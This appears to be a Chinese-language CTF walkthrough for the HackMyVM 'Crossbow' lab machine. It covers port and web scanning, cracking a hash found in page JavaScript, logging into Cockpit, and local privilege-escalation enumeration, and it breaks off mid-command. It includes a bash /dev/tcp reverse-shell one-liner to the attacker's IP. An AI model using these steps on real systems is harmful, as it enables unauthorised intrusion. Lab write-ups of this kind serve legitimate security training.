{"id":498,"date":"2024-04-03T22:06:09","date_gmt":"2024-04-03T14:06:09","guid":{"rendered":"http:\/\/162.14.82.114\/?p=498"},"modified":"2024-04-03T22:06:09","modified_gmt":"2024-04-03T14:06:09","slug":"hmv-_-crossbow","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/498\/04\/03\/2024\/","title":{"rendered":"hmv[-_-]Crossbow"},"content":{"rendered":"<h1>Crossbow<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205673.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205673.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403200149466\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.3 -- -A<\/code><\/pre>\n<pre><code class=\"language-css\">Open 172.20.10.3:22\nOpen 172.20.10.3:80\nOpen 172.20.10.3:9090\n\nPORT     STATE SERVICE     REASON  VERSION\n22\/tcp   open  ssh         syn-ack OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)\n| ssh-hostkey: \n|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW\/HgWpBe3FlvvdyW1IsS+o1NK\/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=\n|   256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8\/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt\n80\/tcp   open  http        syn-ack Apache httpd 2.4.57 ((Debian))\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-title: Polo&#039;s Adventures\n|_http-server-header: Apache\/2.4.57 (Debian)\n9090\/tcp open  zeus-admin? syn-ack\n| fingerprint-strings: \n|   GetRequest, HTTPOptions: \n|     HTTP\/1.1 400 Bad request\n|     Content-Type: text\/html; charset=utf8\n|     Transfer-Encoding: chunked\n|     X-DNS-Prefetch-Control: off\n|     Referrer-Policy: no-referrer\n|     X-Content-Type-Options: nosniff\n|     Cross-Origin-Resource-Policy: same-origin\n|     X-Frame-Options: sameorigin\n|     &lt;!DOCTYPE html&gt;\n|     &lt;html&gt;\n|     &lt;head&gt;\n|     &lt;title&gt;\n|     request\n|     &lt;\/title&gt;\n|     &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text\/html; charset=utf-8&quot;&gt;\n|     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n|     &lt;style&gt;\n|     body {\n|     margin: 0;\n|     font-family: &quot;RedHatDisplay&quot;, &quot;Open Sans&quot;, Helvetica, Arial, sans-serif;\n|     font-size: 12px;\n|     line-height: 1.66666667;\n|     color: #333333;\n|     background-color: #f5f5f5;\n|     border: 0;\n|     vertical-align: middle;\n|_    font-weight: 300;\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port9090-TCP:V=7.94SVN%I=7%D=4\/3%Time=660D456F%P=x86_64-pc-linux-gnu%r(\nSF:GetRequest,DB1,&quot;HTTP\/1\\.1\\x20400\\x20Bad\\x20request\\r\\nContent-Type:\\x20\nSF:text\/html;\\x20charset=utf8\\r\\nTransfer-Encoding:\\x20chunked\\r\\nX-DNS-Pr\nSF:efetch-Control:\\x20off\\r\\nReferrer-Policy:\\x20no-referrer\\r\\nX-Content-\nSF:Type-Options:\\x20nosniff\\r\\nCross-Origin-Resource-Policy:\\x20same-origi\nSF:n\\r\\nX-Frame-Options:\\x20sameorigin\\r\\n\\r\\n29\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;h\nSF:tml&gt;\\n&lt;head&gt;\\n\\x20\\x20\\x20\\x20&lt;title&gt;\\r\\nb\\r\\nBad\\x20request\\r\\nc2c\\r\\n\nSF:&lt;\/title&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20http-equiv=\\&quot;Content-Type\\&quot;\\x20conte\nSF:nt=\\&quot;text\/html;\\x20charset=utf-8\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20name=\\&quot;vi\nSF:ewport\\&quot;\\x20content=\\&quot;width=device-width,\\x20initial-scale=1\\.0\\&quot;&gt;\\n\\x2\nSF:0\\x20\\x20\\x20&lt;style&gt;\\n\\tbody\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20\\x20margin:\\x200;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20font-family:\\x20\\&quot;RedHatDisplay\\&quot;,\\x20\\&quot;Open\\x20Sans\\&quot;,\\x20Helvetic\nSF:a,\\x20Arial,\\x20sans-serif;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20font-size:\\x2012px;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20line-height:\\x201\\.66666667;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\\nSF:x20\\x20\\x20color:\\x20#333333;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20background-color:\\x20#f5f5f5;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:}\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20img\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20\\x20\\x20\\x20\\x20border:\\x200;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20\\x20\\x20vertical-align:\\x20middle;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\\nSF:x20}\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20h1\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20font-weight:\\x20300;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\\nSF:x20\\x20}\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20p\\x20&quot;)%r(HTTPOptions,DB1,&quot;HT\nSF:TP\/1\\.1\\x20400\\x20Bad\\x20request\\r\\nContent-Type:\\x20text\/html;\\x20char\nSF:set=utf8\\r\\nTransfer-Encoding:\\x20chunked\\r\\nX-DNS-Prefetch-Control:\\x2\nSF:0off\\r\\nReferrer-Policy:\\x20no-referrer\\r\\nX-Content-Type-Options:\\x20n\nSF:osniff\\r\\nCross-Origin-Resource-Policy:\\x20same-origin\\r\\nX-Frame-Optio\nSF:ns:\\x20sameorigin\\r\\n\\r\\n29\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;html&gt;\\n&lt;head&gt;\\n\\x20\nSF:\\x20\\x20\\x20&lt;title&gt;\\r\\nb\\r\\nBad\\x20request\\r\\nc2c\\r\\n&lt;\/title&gt;\\n\\x20\\x20\nSF:\\x20\\x20&lt;meta\\x20http-equiv=\\&quot;Content-Type\\&quot;\\x20content=\\&quot;text\/html;\\x2\nSF:0charset=utf-8\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20name=\\&quot;viewport\\&quot;\\x20conten\nSF:t=\\&quot;width=device-width,\\x20initial-scale=1\\.0\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;styl\nSF:e&gt;\\n\\tbody\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20margin\nSF::\\x200;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20font-family:\\x\nSF:20\\&quot;RedHatDisplay\\&quot;,\\x20\\&quot;Open\\x20Sans\\&quot;,\\x20Helvetica,\\x20Arial,\\x20sa\nSF:ns-serif;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20font-size:\\x\nSF:2012px;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20line-height:\\x\nSF:201\\.66666667;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20color:\\\nSF:x20#333333;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20background\nSF:-color:\\x20#f5f5f5;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\\x20\\x2\nSF:0\\x20\\x20\\x20\\x20img\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\nSF:\\x20border:\\x200;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20vert\nSF:ical-align:\\x20middle;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20h1\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20font-weight:\\x20300;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\nSF:\\x20\\x20\\x20\\x20\\x20\\x20p\\x20&quot;);\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<p>\u5f00\u542f\u4e86 80 \u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fdb\u884c\u76ee\u5f55\u626b\u63cf\uff1a<\/p>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.3\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt,html.png,jpg,zip<\/code><\/pre>\n<pre><code class=\"language-css\">\/.php                 (Status: 403) [Size: 276]\n\/.html.png            (Status: 403) [Size: 276]\n\/.php                 (Status: 403) [Size: 276]\n\/.html.png            (Status: 403) [Size: 276]\n\/server-status        (Status: 403) [Size: 276]<\/code><\/pre>\n<h3>\u6f0f\u6d1e\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.3<\/code><\/pre>\n<pre><code class=\"language-css\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.3\n+ Target Hostname:    172.20.10.3\n+ Target Port:        80\n+ Start Time:         2024-04-03 08:09:20 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.57 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: 1455, size: 60575d67a7363, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .\n+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host\n+ End Time:           2024-04-03 08:09:38 (GMT-4) (18 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h3>\u4e2d\u95f4\u4ef6\u67e5\u8be2<\/h3>\n<pre><code class=\"language-bash\">whatweb http:\/\/172.20.10.3                      \nhttp:\/\/172.20.10.3 [200 OK] Apache[2.4.57], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache\/2.4.57 (Debian)], IP[172.20.10.3], Script, Title[Polo&#039;s Adventures]<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u6316\u6398<\/h2>\n<h3>\u9875\u9762\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205676.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205676.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403201442978\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u4e00\u4e0b\u63d2\u4ef6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205677.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205677.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403202019625\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>F12\u770b\u4e00\u4e0b\u6709\u6ca1\u6709\u505adns\u89e3\u6790\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205678.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205678.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403202702072\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u85cf\u4e86\u4e1c\u897f\uff1a<\/p>\n<pre><code>const API_ENDPOINT = &quot;https:\/\/phishing.crossbow.hmv\/data&quot;;\nconst HASH_API_KEY = &quot;49ef6b765d39f06ad6a20bc951308393&quot;;\n\n\/\/ Metadata for last system upgrade\nconst SYSTEM_UPGRADE = {\n    version: &quot;2.3.1&quot;,\n    date: &quot;2023-04-15&quot;,\n    processedBy: &quot;SnefruTools V1&quot;,\n    description: &quot;Routine maintenance and security patches&quot;\n}<\/code><\/pre>\n<p>\u5f97\u5230\u4e00\u7ec4\u7b80\u5355\u7684\u7528\u6237\u540d\u5bc6\u7801\uff0c\u5e76\u4e14\u5f97\u5230\u5b83\u8fd9\u4e2a\u5bc6\u7801\u662f\u7531<code>SnefruTools V1<\/code>\u8fdb\u884c\u52a0\u5bc6\u5f97\u6765\u7684\uff0c\u5c1d\u8bd5\u770b\u770b\u8fd9\u662f\u4e2a\u5565\uff1a<\/p>\n<pre><code class=\"language-apl\">polo\n49ef6b765d39f06ad6a20bc951308393<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205679.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205679.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403204245548\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u627e\u5230\u4e86\u7f51\u5740\uff0c\u5728\u7ebf\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205680.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205680.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403204348468\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">ELzkRudzaNXRyNuN6<\/code><\/pre>\n<h3>\u8bbf\u95ee\u654f\u611f\u7aef\u53e3<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205681.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205681.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403202133689\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-apl\">polo\nELzkRudzaNXRyNuN6<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205682.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205682.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403204445424\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fdb\u6765\u4e86\u554a\uff01\uff01\uff01\u70b9\u51fb\u7ec8\u7aef\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205683.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404032205683.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240403204514424\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u628ashell\u5f39\u5230\u672c\u5730\u53bb\uff1a<\/p>\n<pre><code class=\"language-bash\">bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/172.20.10.8\/1234 &lt;&amp;1&#039;<\/code><\/pre>\n<pre><code class=\"language-bash\">sudo pwncat-cs -lp 1234 2&gt;\/dev\/null<\/code><\/pre>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) polo@crossbow:\/home\/polo$ whoami;id\npolo\nuid=1001(polo) gid=1001(polo) groups=1001(polo)\n(remote) polo@crossbow:\/home\/polo$ sudo -l\n[sudo] password for polo: \nSorry, user polo may not run sudo on crossbow.\n(remote) polo@crossbow:\/home\/polo$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nDebian-exim:x:100:102::\/var\/spool\/exim4:\/usr\/sbin\/nologin\nmessagebus:x:101:103::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\nlea:x:1000:1000::\/home\/lea:\/bin\/bash\npolo:x:1001:1001:,,,:\/home\/polo:\/bin\/bash\npolkitd:x:996:996:polkit:\/nonexistent:\/usr\/sbin\/nologin\nmysql:x:103:106:MySQL Server,,,:\/nonexistent:\/bin\/false\n_rpc:x:104:65534::\/run\/rpcbind:\/usr\/sbin\/nologin\nstatd:x:105:65534::\/var\/lib\/nfs:\/usr\/sbin\/nologin\ngluster:x:106:107::\/var\/lib\/glusterd:\/usr\/sbin\/nologin\ncockpit-ws:x:107:113::\/nonexistent:\/usr\/sbin\/nologin\ncockpit-wsinstance:x:108:114::\/nonexistent:\/usr\/sbin\/nologin\ndnsmasq:x:109:65534:dnsmasq,,,:\/var\/lib\/misc:\/usr\/sbin\/nologin\npedro:x:1002:1002::\/home\/pedro:\/bin\/sh\n(remote) polo@crossbow:\/home\/polo$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily; }\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly; }\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly; }\n#\n(remote) polo@crossbow:\/home\/polo$ ls -la\ntotal 48\ndrwx------ 1 polo polo 4096 Sep 16  2023 .\ndrwxr-xr-x 1 root root 4096 Sep 18  2023 ..\nlrwxrwxrwx 1 root root    9 Sep  5  2023 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 polo polo  220 Sep  3  2023 .bash_logout\n-rw-r--r-- 1 polo polo 3527 Sep 16  2023 .bashrc\ndrwx------ 2 polo polo 4096 Sep 15  2023 .cache\ndrwx------ 3 polo polo 4096 Sep 16  2023 .gnupg\ndrwxr-xr-x 3 polo polo 4096 Sep 16  2023 .local\n-rw-r--r-- 1 polo polo  807 Sep  3  2023 .profile\ndrwx------ 1 root root 4096 Sep  3  2023 .ssh\n(remote) polo@crossbow:\/home\/polo$ find \/ -perm -u=s -type f 